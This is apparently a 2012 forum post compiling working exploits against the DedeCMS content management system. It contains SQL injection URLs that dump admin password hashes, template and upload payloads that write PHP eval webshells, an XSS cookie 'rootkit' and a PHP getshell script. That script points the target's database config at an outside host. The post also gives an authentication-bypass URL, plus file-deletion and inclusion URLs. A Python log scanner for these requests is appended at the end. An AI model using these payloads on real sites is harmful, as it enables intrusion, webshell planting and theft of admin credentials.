DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After posting, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell written directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter has to be switched off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; afterwards, visiting any of the URLs below in any way triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "\nExploit Success \n";
if($aid==1)echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
if($aid==2)echo "\nShell:".$url."/$path/fuck.php\n";
if($aid==3)echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
echo "\nExploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "\nNo response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you go straight into the site backend.
This vulnerability requires first knowing the backend path.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below, and the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, post an article and upload an image; then in attachment management replace the image with our crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(crafted here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article. Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Post an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and last 7 characters dropped, giving a 20-character MD5; to get the 16-character MD5 from that, drop 3 more from the front and 1 from the back.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
Exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is shown.
2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the information from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
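As an added defensive example (not part of the original post), here is a small Python access-log scanner that flags the request shapes quoted above: the GLOBALS variable-override keys, the rss.php _Cs parameter, the raw sql parameter on advancedsearch.php, path traversal in oldface, and script tags in gotopage. The log lines and IP addresses are constructed, and the helper names classify and scan are my own.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# One "combined"-format access-log entry: ip, identity, user, [time], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators taken from the requests quoted in the post.
GLOBALS_OVERRIDE = re.compile(r"^_(?:cookie|post|get)\[globals\]", re.I)  # _POST[GLOBALS][cfg_dbhost]=...
RSS_CS = re.compile(r"^_cs\[", re.I)                                      # rss.php?_Cs[...]=...
TRAVERSAL = re.compile(r"(?:^|/)\.\./")                                   # oldface=/uploads/../../..
SCRIPT_TAG = re.compile(r"<script", re.I)                                 # gotopage="><script>


def classify(method: str, target: str) -> list[str]:
    """Return the indicators found in one request line (empty list if clean)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    findings = []
    # The mytag_js.php override travels in the POST body, which access logs do not
    # record; the script is normally fetched with GET, so a POST to it is notable.
    if method.upper() == "POST" and path.endswith("/plus/mytag_js.php"):
        findings.append("mytag_js-post")
    # parse_qsl percent-decodes keys and values, so %5BGLOBALS%5D compares as [GLOBALS]
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if GLOBALS_OVERRIDE.search(key):
            findings.append("globals-override:" + key)
        if RSS_CS.search(key) and path.endswith("/plus/rss.php"):
            findings.append("rss-injection:" + key)
        if key == "sql" and path.endswith("/plus/advancedsearch.php"):
            findings.append("advancedsearch-raw-sql")
        if TRAVERSAL.search(value):
            findings.append("traversal:" + key)
        # decode once more so a double-encoded %253Cscript is still caught
        if SCRIPT_TAG.search(unquote_plus(value)):
            findings.append("reflected-script:" + key)
    return findings


def scan(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Scan access-log text; return (client ip, request target, indicators) per flagged line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m["method"], m["target"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


# Constructed sample log (TEST-NET addresses): one benign line, four shaped like the post's requests.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Oct/2012:10:42:14 +0800] "GET /member/index.php?uid=test HTTP/1.1" 200 512
203.0.113.8 - - [18/Oct/2012:10:43:01 +0800] "GET /dede/login.php?dopost=login&userid=admin&pwd=x&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=198.51.100.5 HTTP/1.1" 302 0
203.0.113.9 - - [18/Oct/2012:10:44:30 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048
203.0.113.9 - - [18/Oct/2012:10:45:12 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 128
203.0.113.10 - - [18/Oct/2012:10:46:00 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 64
"""

if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, target, ", ".join(findings))
```

Only the request line is inspected, so overrides carried in cookies or POST bodies need a WAF or application-level check rather than a log scan.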